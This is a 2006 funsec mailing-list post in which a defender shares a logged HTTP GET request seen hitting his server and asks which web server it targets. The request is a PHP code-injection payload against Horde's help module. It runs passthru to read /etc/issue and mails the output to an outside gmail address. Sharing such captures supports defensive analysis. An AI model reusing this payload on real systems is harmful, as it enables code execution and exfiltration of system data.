[funsec] interesting attack

Henderson, Dennis K. Dennis.Henderson at umb.com
Fri Apr 14 09:11:07 CDT 2006


Which web server would be a target for this GET?

Not sure what group to post this to but I'm sure having fun watching the
attempts..

:)




GET
/horde2/services/help/?show=about&module=;%22.passthru(%22cat%20%22.chr(
47).%22etc%22.chr(47).%22issue%20%7Cmail%20-s%20ho2%20p0wd3r31337 at gmail.
com%22);'. HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: x.x.x.x
Connection: Close

------------------------------------------------------------------------------
NOTICE:  This electronic mail message and any attached files are confidential.  The information is exclusively for the use of the individual or entity intended as the recipient.  If you are not the intended recipient, any use, copying, printing, reviewing, retention, disclosure, distribution or forwarding of the message or any attached file is not authorized and is strictly prohibited.  If you have received this electronic mail message in error, please advise the sender by reply electronic mail immediately and permanently delete the original transmission, any attachments and any copies of this message from your computer system. Thank you.

==============================================================================




More information about the funsec mailing list